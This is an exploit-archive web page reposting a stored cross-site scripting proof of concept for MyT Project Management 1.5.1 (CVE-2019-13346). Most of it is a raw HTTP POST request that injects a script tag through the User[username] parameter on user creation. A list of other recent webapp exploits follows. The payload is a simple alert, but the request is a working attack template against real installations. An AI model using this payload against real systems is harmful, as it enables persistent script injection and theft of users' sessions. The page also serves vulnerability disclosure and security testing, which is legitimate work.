Myt project management 1.5.1 user[username] persistent crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-07-12 | Type : webapps | Platform : php
This exploit / vulnerability Myt project management 1.5.1 user[username] persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: MyT Project Management - User[username] Stored Cross Site
Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://manageyourteam.net/index.html
# Software Link: https://sourceforge.net/projects/myt/files/latest/download
# Version: 1.5.1
# Category: Webapps
# Tested on: Xampp for Windows
# Software Description : MyT is an extremely powerful project management
tool, and it's easy to use for both administrators and end-users with a
really intuitive structure.
# CVE : CVE-2019-13346
==================================================================

#Description: "User[username]" parameter has a xss vulnerability. Malicious
code is being written to database while user is creating process.
#to exploit vulnerability,add user that setting username as
"<sCript>alert("XSS")</sCript>" malicious code.



POST /myt-1.5.1/user/create HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/myt-1.5.1/user/create
Content-Type: multipart/form-data;
boundary=---------------------------1016442643560510919154680312
Content-Length: 3921
Cookie: PHPSESSID=bp16alfk843c4qll0ejq302b2j
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[username]"

<sCript>alert("XSS")</sCript>
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[password]"

12345
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[password_confirm]"

12345
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[email]"

ad1@gmail.com
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[name]"


-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[surname]"


.
..snip
..snip
.

Myt project management 1.5.1 user[username] persistent crosssite scripting


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Myt project management 1.5.1 user[username] persistent crosssite scripting Vulnerability / Exploit